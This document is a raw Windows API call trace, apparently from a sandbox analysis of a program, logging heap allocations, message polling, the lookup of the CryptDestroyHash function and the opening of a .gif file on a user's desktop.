[0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.483] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.483] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.483] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.483] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.484] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.484] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.484] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.486] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.486] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0164.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0164.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/eGIW Yzvh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\egiw yzvh.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0164.494] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.494] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 